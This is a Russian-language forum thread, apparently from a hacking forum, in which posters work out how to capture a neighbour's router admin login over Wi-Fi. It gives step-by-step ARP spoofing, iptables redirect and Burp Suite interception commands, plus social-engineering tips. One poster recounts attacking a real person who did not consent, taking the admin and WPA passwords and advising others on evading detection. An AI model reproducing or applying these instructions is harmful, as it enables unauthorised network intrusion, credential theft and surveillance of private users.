Спс +, буду дальше копать . Остался один неясный момент по поводу перенаправления в админку роутера..
Добавлять заголовок ко всем HTTP ответам: Code: Location: http://192.168.1.1/ base64(login + ':' + password), практически как Basic Authentication.
Вам немножко не повезло с роутером - у этого аутентификация через вэб-форму, незаметно клиент логин+пароль не отдаст. Поднимите свой сервер с "WWW-Authenticate". Далее - нужен "transparent proxy". Весь трафик на 80 порт от клиента перенаправляете на него, при помощи iptables. А в прокси - уже можно менять содержимое вэб страничек. И можно в страничку вставить фрейм со ссылкой на свой сервер с "WWW-Authenticate". У клиента при этом будет выскакивать окошко с требованием пары логин+пароль. Может кто еще чего-нибудь попроще предложит.
Решил попробовать Burp Suite, сорри за навязчивость - если не сложно, не могли бы указать на ошибку, что делаю не так? С самого начала, по шагам, дабы сразу отмести лишнее (атакующий комп на обычном Арче, адаптер DWA-582): Ip-форвардинг: echo "1" >/proc/sys/net/ipv4/ip_forward Проверка: cat /proc/sys/net/ipv4/ip_forward 1 Перенаправление трафика на порт 8080: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 Проверка: iptables-save # Generated by iptables-save v1.6.1 on Wed Jul 12 22:37:29 2017 *nat REROUTING ACCEPT [331:37006] :INPUT ACCEPT [204:13801] :OUTPUT ACCEPT [794:48797] OSTROUTING ACCEPT [1081:80910] -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080 COMMIT # Completed on Wed Jul 12 22:37:29 2017 Смена МАС атакующей карты (macchanger), запуск суппликанта, получение ip по dhcp, подключение своего планшета на андройде к атакуемому роутеру по wi-fi для теста. ARP-спуфинг: arpspoof -i wls32 -t 192.168.1.70 192.168.1.1 Проверка АРП-таблицы на планшете (работа спуфинга): cat /proc/net/arp IP addres HW type Flags HW addres Mask Device 192.168.1.63 0x1 0x2 a2:97:a2:55:53:be * wlan0 192.168.1.1 0x1 0x2 a2:97:a2:55:53:be * wlan0 Запуск Burp Suite, настройка: Proxy > Options > Proxy Listeners > Add > Specific Addres > 192.168.1.63 (Bind to port 8080) > Request Handing > Support Invisible Proxying > Ok Intercept > Intercept is on Шарманка работает, пакеты снифятся, сообщения выводятся . Проблема в том, что так и не получилось перенаправить запросы клиента (мой тестовый андройд) в админку роутера, что делаю: Добавляю правило: Proxy > Options > Match and Replace > Add > Type: Responce Header Match: оставляю пустым Replace: Location: http://192.168.1.1/ > Ok После добавления правила ко всем заголовкам ответов добавляется Location: http://192.168.1.1/ - видно в выводе модифицированных ответов, но планшет как ходил нормально на все сайты, так и ходит - ничего не меняется. Поясните плз, что делаю не так - собственных мыслей уже не осталось.
Ну так в SSL/TLS он подменить заголовки не сможет, без подмены сертификата. Я надеюсь, вы это понимаете? Тестируйте на сайтах без HTTPS.
Спасибо большое, понял куда копать, о чём речь в общем понимаю (кодировка трафика), но с темой пока знаком поверхностно, не сразу становятся видны тонкости , мне в общем и нужен был такой ответ - общее направление, дальше надеюсь разберусь. Видимо по этому когда пробовал ettercap, браузер андройда ругался на сертефикаты - видимо аллинклюдед, но чтобы понять где подводные камни (заставить всё работать), IMHO лучше начинать с более примитивного софта вроде arpspoof, когда работа видна в консоли, и программа выполняет единственную необходимую функцию. В общем спасибо, буду дальше учиться.
Всё-же не получается заставить клиента зайти в админку роутера с помощью автоматического добавления Location: http://192.168.1.1/ в заголовки ответов (пробовал на не шифрованном http), клиент упорно заходит на необоходимую ему страницу . Разобрался немного (на уровне нуба) с Burp Suite, получилось таки заставить вручную. Клиент с роутером при входе в админку обменивается 4-мя запросами-ответами, во втором ответе роутер шлёт страницу входа. При помощи интерцептера (когда можно на лету вручную редактировать запросы-отвееты - они приостанавливаются, и отправляются вручную), когда клиенту идёт страница, полностью меняю её на страницу роурера - она грузится у клиента, дальше отбрасываю 2-3 следующих запроса клиента - у клиента на экране остаётся загруженная страница админки, т.е. если ввести в неё логин-пароль, они придут. Только так получилось, но хоть что-то . Правда атакуемый оказался не прост, не хочет слать логин-пароль . Хотел задать вопрос не совсем по теме - хочу АРП-спуфинг производить на роутере, а Burp Suite использовать в Windows (иногда необходимо, да и роутер лучше ловит сигнал - больше точек видит) - на роутере (OpenWRT) почти получилось заставить всё работать - хотел спросить, возможно ли перенаправить траффик с роутера на комп, чтобы прокси Burp Suite работал на компе, и перехватывал траффик, т.е. такое возможно?
Таки получилось отправить все запросы клиента в админку роутера при помощи iptables, хотел описать процесс настройки, может кому пригодится, и задать ещё вопрос в связи с этим. 1. Сбрасываем все правила фаервола (делал на роутере OpenWRT, актуально для любой Linux-платформы, дабы не мешались, и не блокировали трафик): iptables -P INPUT ACCEPT iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT iptables -F iptables -X iptables -t nat -F iptables -t nat -X iptables -t mangle -F iptables -t mangle -X iptables -t raw -F iptables -t raw -X Это безопасно, т.к. назначается действие по умолчанию ACCEPT для входящего, транслируемого и исходящего трафика, изменения никуда не сохраняются, т.е. в случае возникновения проблем - просто перезагрузка. Для ArchLinux можно этого не делать, там всё девственно-чисто по-умолчанию. Можно команды добавить в скрипт для оптимизации процесса. 2. Форвардинг пакетов, если настраиваем не роутер (в роутерах по-умолчанию уже есть), операция временная, после перезагрузки сбросится: echo "1" >/proc/sys/net/ipv4/ip_forward 3. Маскарадинг (чтобы сетевые машины могли выходить в сеть): iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE 4. Смена целевого адреса в заголовках пакетов клиентов (в т.ч. тех устройств, которые будем спуфить в дальнейшем): iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1 Т.е. все запросы с 80-го порта (http) для любого устройства будут перенаправляться в админку роутера 192.168.1.1, т.е. любой запрос по http вызовет загрузку у атакуемого (кого будем спуфить) страницы админки роутера. 5. Собственно арп-спуф цели (192.168.1.150): arpspoof -i wlan0 -t 192.168.1.150 192.168.1.1 ----- Это работает не со всеми роутерами, с ASUS вполне, пробовал на БилайнСмартБокс - ошибка соединения. ----- Ну и вопрос: почему это работает не со всеми роутерами, и возможно ли каким-нибудь образом так-же перенаправить https - запросы? Т.е. вышеописанный способ вызывает загрузку страницы админки только для http - запросов, https запрос спокойно идёт куда ему надо. Пробовал добавлять правило для порта 443, при запросе с тестового планшета - ошибка соединения, что естественно, т.к. страница админки на 80 порту. Если возможно, было-бы здорово в виде примера команды.
Добрый день. Нужна помощь спецов) Вобщем есть роутер ASUS RT-N12E....есть подключение по wi-fi... нужен доступ в админку..... с помощью программ упомянутых в начале этой темы узнать логин\пароль неполучается...... Есть какието еще варианты получить доступ к админке? Спасибо заранее)
Переводишь все запросы на ип роутера и ждёшь пока хозяин он непонятки введёт данные. Можешь на свой сервер с какой нить ошибкой отправить, а потом на роутер. СИ примени.
Как выше писали - днс-спуфинг (на форуме есть описание), и таки можно заставить ввести логин-пароль. Я делал при помощи dnsspoof, burpsuite и ip-tables. Т.е. в таком деле пошаговая инструкция вряд ли поможет (т.е. она есть на форуме) - придётся изучить вопрос, дабы хоть немного понять суть процессов (MITM-атака), т.к. в противном случае всё просто не будет работать из-за какой-нибудь мелочи. Т.е. в идеале нужно понимать, как настраивать правила фаервола в linux при помощи ip-tables, дабы трафик ходил откуда нужно и куда нужно после применения спуфинга, и не блокировался, потом применить снифер с фильтром, или прокси-сервер с возможностью модификации трафика. В общем если нуб в этом вопросе, как я придётся много чего прочитать.
Я так сделал - первым правилом ip-tables блокировал https-трафик (это нужно было, т.к. если перенаправить все на 80 порт атакующего компа, burpsuite начинал себя странно вести - блокировал http-запросы), вторым правилом - трафик с 80 порта на 8080, на котором burpsuite, в burpsuite в настройке прокси есть возможность так-же перенаправлять все запросы на нужный ip - указал адрес админки атакуемого роутера. В итоге при https-запросах атакуемый видел ошибку подключения, при http - заходил в админку. Пока не заблокировал https, так и не заработало, дело в burpsuite, но в чём конкретно не понял. После нескольких часов атаки получил таки пароль (нужно сказать не сразу, человек видимо чувствовал, что что-то не так, скорее всего просто надоело лицезреть админку при всех запросах). После того, как пришёл пароль, зашёл в админку посмотреть на результат , почти сразу-же роутер вырубили, на следующий день пароль wpa, как и пароль от админки сменили. Благо был wps-пин, через который вытащил снова пароль wpa, и снова пришлось доставать человека mitm-атакой. Когда второй раз заходил в админку, увидел, что левое подключение в этой прошивке - это сплошное палево, т.к. на первой странице отображается список клиентов большими буквами с именем хоста и mac , т.е. в идеале нужно маскироваться под клиента владельца роутера, дабы не наводить панику. Так же, если кто-то зашёл в админку, и в процессе второй человек так-же попытается войти, ему будет большое сообщение "такой-то ip уже выполнил вход, вы не сможете войти" - т.е. нужно аккуратно. В общем гемморой, но можно при желании.
Помогите протестировать, как и чем? DSL-AC68U 3.0.0.4.376_2158-g340202b confirmed vulnerable, https://github.com/jduck/asus-cmd
